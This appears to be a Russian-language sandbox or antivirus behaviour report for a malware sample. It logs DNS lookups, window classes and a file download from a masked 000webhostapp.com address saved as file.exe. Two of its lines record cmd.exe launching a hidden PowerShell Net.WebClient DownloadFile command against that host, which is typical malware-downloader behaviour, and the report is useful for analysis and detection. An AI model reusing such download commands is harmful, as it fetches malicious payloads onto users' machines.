Техническая информация
- http://ar#####.000webhostapp.com/nufa5ntjq6fgdq/aplyqr6lub2s8udex2y3rkm6cbx2rspj66n42/wmwwszekhdl9ectg6rpgn2oboeyxvk6pigyompp41dq7yek38gt754k9t9hxv3hvt3xfqz1ul9/023157206f0adb0ebfc27fb907c9bd71... as c:/media/file.exe
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012019110120191102\index.dat
- http://google.com/
- http://www.google.com/
- DNS ASK google.com
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://ar#####.000webhostapp.com/nufa5ntjq6fgdq/aplyqr6lub2s8udex2y3rkm6cbx2rspj66n42/wmwwszekhdl9ectg6rpgn2oboeyxvk6pigyompp41d...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://ar#####.000webhostapp.com/nufa5ntjq6fgdq/aplyqr6lub2s8udex2y3rkm6cbx2rspj66n42/wmwwszekhdl9ectg6rpgn2oboeyxvk6pigyompp41d...